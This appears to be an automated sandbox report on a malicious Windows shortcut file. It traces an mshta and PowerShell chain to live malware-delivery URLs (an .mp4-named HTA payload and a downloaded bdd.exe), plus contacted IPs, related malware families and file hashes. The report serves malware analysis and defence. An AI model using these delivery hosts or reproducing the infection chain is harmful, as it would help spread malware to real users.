                          https://static.klipxuhaq.shop/BUX6P.mp4Cmshta.exe, 00000005.00000003.2877286551.00000154F1D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2882216355.00000154F1D4E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2882216355.00000154F1D68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2877286551.00000154F1D68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2877918246.00000154F1D2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2885295855.00000154F1D4F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2885295855.00000154F1D68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2881397937.00000154F1D68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2877918246.00000154F1D68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2881397937.00000154F1D2D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.borland.com/namespaces/Typespowershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://static.klipxuhaq.shop/BUX6P.mp4?mshta.exe, 00000005.00000002.2885176784.00000154F1CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://streams.videolan.org/upload/powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ip-api.com/json/powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drfalse
                            		high
                            https://contoso.com/powershell.exe, 00000008.00000002.2750580116.000001EED3634000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://denek.local-wanderer.shoppowershell.exe, 00000008.00000002.2671803859.000001EEC3A49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC5255000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.2750580116.000001EED3634000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://static.klipxuhaq.shop/BUX6P.mp4ojrdtjmshta.exe, 00000005.00000003.2883113803.0000015CF8A6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://ipinfo.io/bdd.exe.8.drfalse
                                  		high
                                  http://denek.local-wanderer.shoppowershell.exe, 00000008.00000002.2671803859.000001EEC5320000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://denek.local-wanderpowershell.exe, 00000008.00000002.2671803859.000001EEC5255000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2350655084.000001D9BF070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC35C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://static.klipxuhaq.shop/BUX6P.mp4...Jmshta.exe, 00000005.00000002.2887124034.0000015CF4833000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://static.klipxuhaq.shop/BUX6P.mp4C:mshta.exe, 00000005.00000002.2885176784.00000154F1CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2885704506.00000154F1DE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2876123096.00000154F1DC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2877227963.00000154F1DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://qu.ax/Mcyga.pdf0powershell.exe, 00000008.00000002.2671803859.000001EEC37E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://static.klipxuhaq.shop/BUX6P.mp4Hmshta.exe, 00000005.00000002.2885130430.00000154F1CA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp480mshta.exe, 00000005.00000003.2883113803.0000015CF8A6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.2750580116.000001EED3634000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.11.drfalse
                                            		high
                                            https://qu.ax/Mcygpowershell.exe, 00000008.00000002.2671803859.000001EEC4DD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://static.klipxuhaq.shop/BUX6P.mp488mshta.exe, 00000005.00000003.2883113803.0000015CF8A6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.CCAVC.combdd.exe.8.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://denek.lopowershell.exe, 00000008.00000002.2671803859.000001EEC5255000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://qu.ax/Mcpowershell.exe, 00000008.00000002.2671803859.000001EEC4DD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2671803859.000001EEC37E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drfalse
                                                    		high
                                                    https://static.klipxuhaq.shop/BUX6P.mp4pehpvmshta.exe, 00000005.00000003.2883113803.0000015CF8A6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2671803859.000001EEC37E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://go.micropowershell.exe, 00000008.00000002.2671803859.000001EEC4609000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://static.klipxuhaq.shop/BUX6P.mp4indowspowershell.exe, 00000004.00000002.2350315023.000001D9BD380000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.DelphiFFmpeg.combdd.exe.8.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://contoso.com/Iconpowershell.exe, 00000008.00000002.2750580116.000001EED3634000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://denek.local-wanderer.shop/bdd.exeppowershell.exe, 00000008.00000002.2671803859.000001EEC3A49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC5255000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://crl.ver)svchost.exe, 00000007.00000002.3582064088.0000028796E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://pyfpdf.googlecode.com/)powershell.exe, 00000008.00000002.2671803859.000001EEC5251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3A45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC5255000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2671803859.000001EEC37E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://static.klipxuhaq.shop/BUX6P.mp4$global:?powershell.exefalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://static.klipxuhaq.shop/BUX6P.mp4.exeDrivemshta.exe, 00000005.00000002.2885782387.00000154F1F30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://denek.local-wanderer.shop/bdd.exe~powershell.exe, 00000008.00000002.2671803859.000001EEC5255000.00000004.00000800.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://static.klipxuhaq.shop/mshta.exe, 00000005.00000003.2876123096.00000154F1D86000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://ascstats.iobit.com/base-info.phpbdd.exe.8.drfalse
                                                                		high
                                                                http://www.info-zip.org/bdd.exe, 00000012.00000002.2776900656.0000000006D9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://static.klipxuhaq.shop/BUX6P.mp4ionalmshta.exe, 00000005.00000002.2885176784.00000154F1D16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://static.klipxuhaq.shop/BUX6P.mp4...mshta.exe, 00000005.00000002.2888379859.0000015CF8775000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp4mshta.exe, 00000005.00000003.2883113803.0000015CF8A6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://aka.ms/pscore68powershell.exe, 00000004.00000002.2350655084.000001D9BF0AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2350655084.000001D9BF09B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC35C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://qu.axpowershell.exe, 00000008.00000002.2671803859.000001EEC37E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC51D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhmshta.exe, 00000005.00000003.2883113803.0000015CF8A6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://static.klipxuhaq.shop/BUX6P.mp4=https://static.klipxuhaq.shop/BUX6P.mp413mshta.exe, 00000005.00000003.2883258400.0000015CF8D50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://qu.ax/Mcyga.pdfppowershell.exe, 00000008.00000002.2671803859.000001EEC4DD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        104.21.48.1
                                                                        		static.klipxuhaq.shopUnited States
                                                                        		13335CLOUDFLARENETUStrue
                                                                        188.114.96.6
                                                                        		denek.local-wanderer.shopEuropean Union
                                                                        		13335CLOUDFLARENETUSfalse
                                                                        188.245.211.225
                                                                        		qu.axIran (ISLAMIC Republic Of)
                                                                        		16322PARSONLINETehran-IRANIRfalse

                                                                        Private

                                                                        IP
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1576539
                                                                        Start date and time:2024-12-17 08:37:15 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 7m 21s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:20
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:tz1WicW6sG.lnk
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:30fa4cb1ff177851f537fcb7e1a99dae38620761a7306677162a2664c3c86ea4.lnk.d.lnk
                                                                        Detection:MAL
                                                                        Classification:mal100.evad.winLNK@29/66@8/4
                                                                        EGA Information:Failed
                                                                        HCA Information:Failed
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .lnk

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 2.16.229.162, 2.16.228.134, 54.224.241.105, 50.16.47.176, 34.237.241.83, 18.213.11.84, 172.64.41.3, 162.159.61.3, 2.20.68.207, 2.20.68.228, 23.203.161.57, 23.32.239.56, 2.19.198.27, 23.195.39.65, 20.12.23.50, 23.47.168.24
                                                                        • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, geo2.adobe.com, crl.root-x1.letsencrypt.org.edgekey.net
                                                                        • Execution Graph export aborted for target bdd.exe, PID 7204 because it is empty
                                                                        • Execution Graph export aborted for target mshta.exe, PID 5868 because there are no executed function
                                                                        • Execution Graph export aborted for target powershell.exe, PID 3924 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 6956 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        02:38:21API Interceptor2x Sleep call for process: svchost.exe modified
                                                                        02:38:22API Interceptor162x Sleep call for process: powershell.exe modified
                                                                        02:38:40API Interceptor1x Sleep call for process: AcroCEF.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        104.21.48.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                        • twirpx.org/administrator/index.php
                                                                        SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                        • www.antipromil.site/7ykh/
                                                                        188.114.96.6236236236.elfGet hashmaliciousUnknownBrowse
                                                                        • hollweghospitality.com/blog/wp-login.php
                                                                        BanK_copy.rtfGet hashmaliciousUnknownBrowse
                                                                        • 244-3-drvu.4everland.app/bankcopy.exe
                                                                        Purchase Order..exeGet hashmaliciousFormBookBrowse
                                                                        • www.bser101pp.buzz/v89f/
                                                                        ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                                        • orbitdownloader.com/
                                                                        ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                                        • orbitdownloader.com/
                                                                        e6o7hKFmfC.exeGet hashmaliciousFormBookBrowse
                                                                        • www.astrofrance.online/uem3/?BpE=hw9wdlgRPJgu6mhEw3v3abu2JdZhLnzfTKsoEzFZGCpKAu6wx+OREaAyoHMqAY/6AEPW&SH=IDKTKDM

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        qu.axPayment Notification.lnkGet hashmaliciousXWormBrowse
                                                                        • 104.21.86.112
                                                                        Sj5NsTbVHG.lnkGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                        • 172.67.218.147
                                                                        93GwwLKH1N.exeGet hashmaliciousAmadey, PureLog StealerBrowse
                                                                        • 95.164.4.151
                                                                        4YNCkA7eR5.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • 45.83.31.187
                                                                        JUSTIFICANTE DE PAGO PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 142.202.240.89
                                                                        oT6SM13If6.exeGet hashmaliciousChaos, NoCry, PureLog Stealer, XWormBrowse
                                                                        • 66.179.251.65
                                                                        JUSTIFICANTE DE PAGO CF.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 45.83.31.187
                                                                        transfer - 9783423-52323-248.263.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 207.32.217.188
                                                                        Factura para el pago 07848956897.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 207.32.217.188
                                                                        Factura-077865676347.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 205.185.124.198

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSpre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.67.152
                                                                        https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                        • 104.18.11.207
                                                                        Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                        • 104.21.32.1
                                                                        hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.67.152
                                                                        Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • 172.67.210.11
                                                                        Brokerage Invoice.pdf.vbsGet hashmaliciousUnknownBrowse
                                                                        • 104.21.2.70
                                                                        DHL.exeGet hashmaliciousFormBookBrowse
                                                                        • 104.21.48.233
                                                                        SFHgtxFGtB.ps1Get hashmaliciousUnknownBrowse
                                                                        • 104.21.87.65
                                                                        DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.56.70
                                                                        CLOUDFLARENETUSpre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.67.152
                                                                        https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                        • 104.18.11.207
                                                                        Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                        • 104.21.32.1
                                                                        hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.67.152
                                                                        Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • 172.67.210.11
                                                                        Brokerage Invoice.pdf.vbsGet hashmaliciousUnknownBrowse
                                                                        • 104.21.2.70
                                                                        DHL.exeGet hashmaliciousFormBookBrowse
                                                                        • 104.21.48.233
                                                                        SFHgtxFGtB.ps1Get hashmaliciousUnknownBrowse
                                                                        • 104.21.87.65
                                                                        DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.56.70

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0epre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 188.245.211.225
                                                                        • 188.114.96.6
                                                                        HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 188.245.211.225
                                                                        • 188.114.96.6
                                                                        https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                        • 188.245.211.225
                                                                        • 188.114.96.6
                                                                        Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • 188.245.211.225
                                                                        • 188.114.96.6
                                                                        Brokerage Invoice.pdf.vbsGet hashmaliciousUnknownBrowse
                                                                        • 188.245.211.225
                                                                        • 188.114.96.6
                                                                        Nueva orden de compra-836528268278278.xlsx.exeGet hashmaliciousUnknownBrowse
                                                                        • 188.245.211.225
                                                                        • 188.114.96.6
                                                                        Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 188.245.211.225
                                                                        • 188.114.96.6
                                                                        SFHgtxFGtB.ps1Get hashmaliciousUnknownBrowse
                                                                        • 188.245.211.225
                                                                        • 188.114.96.6
                                                                        Nueva orden de compra-836528268278278.xlsx.exeGet hashmaliciousUnknownBrowse
                                                                        • 188.245.211.225
                                                                        • 188.114.96.6
                                                                        fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                        • 188.245.211.225
                                                                        • 188.114.96.6
                                                                        37f463bf4616ecd445d4a1937da06e19Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                        • 104.21.48.1
                                                                        Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • 104.21.48.1
                                                                        69633f.msiGet hashmaliciousVidarBrowse
                                                                        • 104.21.48.1
                                                                        DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.48.1
                                                                        he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.48.1
                                                                        fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                        • 104.21.48.1
                                                                        1iC0WTxgUf.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.48.1
                                                                        Instruction_695-18112-002_Rev.PDF.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                        • 104.21.48.1
                                                                        PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 104.21.48.1
                                                                        file.exeGet hashmaliciousScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, XmrigBrowse
                                                                        • 104.21.48.1

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1310720
                                                                        Entropy (8bit):0.7722598234743342
                                                                        Encrypted:false
                                                                        SSDEEP:1536:pJNVxIssjfjonQaKQA0bTMe0bS0bfQJZfhcZyPzJ0iDub69OGd+lJzZgSsrEGTWz:pJV3wb7cOrGqXuT72iIa5lzW
                                                                        MD5:EC079600A8C2C67C32355DB8075CF73E
                                                                        SHA1:13940271892C7A9FAA244C07B311E1B79F29C76E
                                                                        SHA-256:8762F2D494CC342A0ECABAF52BC4D42295E197157FCBB947591F6DEFEC181295
                                                                        SHA-512:06F88F0F25AC182EC0283852FA833C514BF6FC95F4C4F80784C5F3430E1E6CEDB653920B1238836C81E647F523150A9C758A4F6357D84840AF4D142D38136AD2
                                                                        Malicious:false
                                                                        Preview:.{..........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................... ...........4...Bv=.#.........`h.................h.!.....6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb05449d4, page size 16384, DirtyShutdown, Windows version 10.0
                                                                        Category:dropped
                                                                        Size (bytes):1310720
                                                                        Entropy (8bit):0.7816552515323116
                                                                        Encrypted:false
                                                                        SSDEEP:1536:5SB2ESB2SSjlK/dviQJ5dyDkZA0bVQJOYkr3g16xz2UPkLk+k0KQRkjskjD+qaN4:5azanvxugz2UESQ
                                                                        MD5:DD0F096A6F22BF14A71D21B07B223C63
                                                                        SHA1:24A0D5D63FDEAB2E683BFCC22C4D08966D827603
                                                                        SHA-256:43067006D9F11E3B12F4F3B710236B9C8B55733818A0B794C212B6247DD5EB84
                                                                        SHA-512:EDB6B469B8C097D2ADB76D8C7CE2C144165A0A6DDC44B9BFC91F9A3C18F9C1DC1CB5A79E00226AC4CB6A8187A214656DADAC4FE86DAE51C699D9B7DB0345F4F2
                                                                        Malicious:false
                                                                        Preview:.TI.... .......J.......X\...;...{......................0.o..........{%..&...|q.h.q.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{..................................g.mz.&...|...................".?.&...|...........................#......h.q.....................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):16384
                                                                        Entropy (8bit):0.07824001569711558
                                                                        Encrypted:false
                                                                        SSDEEP:3:g56YeHbeRpalntSlsVlBcXD+7d8/lill12St/ll/SnPK/t:gAzH4putWsPiz+OIjlf
                                                                        MD5:617AFA33D500E4DDCF9EC6456F5CE763
                                                                        SHA1:1C96A2D5B6299ECBD932DD2A39B200720F6E1559
                                                                        SHA-256:07780087598655F2C3FE103FC724F6A1A77ABFE6E36FEF7E64EE27139AD51964
                                                                        SHA-512:5DE53A0D557FDE8F6435D29454CAF8E4CFF7A8718929B9F9966E40F76F491F22DD2A25F98DB37A1239A03A3491FB34B28F2F3B5E889BB14DD4F321570F949930
                                                                        Malicious:false
                                                                        Preview:.pru.....................................;...{...&...|.......{%..............{%......{%.d........{%..................".?.&...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):292
                                                                        Entropy (8bit):5.240645990743886
                                                                        Encrypted:false
                                                                        SSDEEP:6:7Cq2Pv2nKuAl9OmbnIFUt8OIZmw+OrBrkwOv2nKuAl9OmbjLJ:7Cv2HAahFUt8OI/+OrBr5bHAaSJ
                                                                        MD5:D1A03E101D6AB23ECED528A90AF211F4
                                                                        SHA1:12AD015F666CB3D0941CC75C9B111CE97596DAB2
                                                                        SHA-256:D2852477C26050142E648CE0BCD818663064D1EFF78CE9FBAC17730D94D9B07D
